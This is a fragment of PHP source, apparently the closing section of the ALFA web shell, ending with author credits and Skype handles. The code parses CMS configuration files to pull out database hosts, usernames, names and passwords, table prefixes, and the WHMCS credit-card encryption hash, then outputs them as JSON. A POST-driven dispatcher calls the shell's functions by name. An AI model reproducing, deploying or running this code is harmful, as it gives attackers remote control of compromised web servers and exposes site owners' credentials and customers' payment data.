6485$chost = $config[$cms]['host'][1];
6486$cuser = $config[$cms]['dbuser'][1];
6487$cname = $config[$cms]['dbname'][1];
6488$cpw = $config[$cms]['dbpw'][1];
6489$cprefix = $config[$cms]['prefix'][1];
6490if(@is_dir($path)||_alfa_is_dir($path)){
6491$file=$path.$file;
6492}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
6493$file=$path;
6494}else{
6495return false;
6496}
6497$file = __read_file($file);
6498if($cms == "drupal2"){
6499 $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
6500}elseif($cms == "vb"){
6501 $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
6502}
6503if(preg_match($srch_host, $file, $mach)){
6504$data['host'] = $mach[$chost];
6505}
6506if(preg_match($srch_user, $file, $mach)){
6507$data['user'] = $mach[$cuser];
6508}
6509if(preg_match($srch_name, $file, $mach)){
6510$data['dbname'] = $mach[$cname];
6511}
6512if(preg_match($srch_pw, $file, $mach)){
6513$data['password'] = $mach[$cpw];
6514}
6515if(isset($prefix)){
6516if(preg_match($prefix, $file, $mach)){
6517$data['prefix'] = $mach[$cprefix];
6518}
6519}
6520if($cms=='whmcs'){
6521if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
6522$data['cc_encryption_hash'] = $mach[3];
6523}
6524}
6525echo json_encode($data);
6526}
6527if(empty($_POST['a']))
6528if(isset($default_action) && function_exists('alfa' . $default_action))
6529$_POST['a'] = $default_action;
6530else
6531$_POST['a'] = 'FilesMan2';//'FilesMan';
6532if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
6533call_user_func('alfa' . $_POST['a']);
6534exit;
6535/*
6536#Persian Gulf For Ever
6537#skype : sole.sad
6538#skype : ehsan.invisible
6539*/
6540?>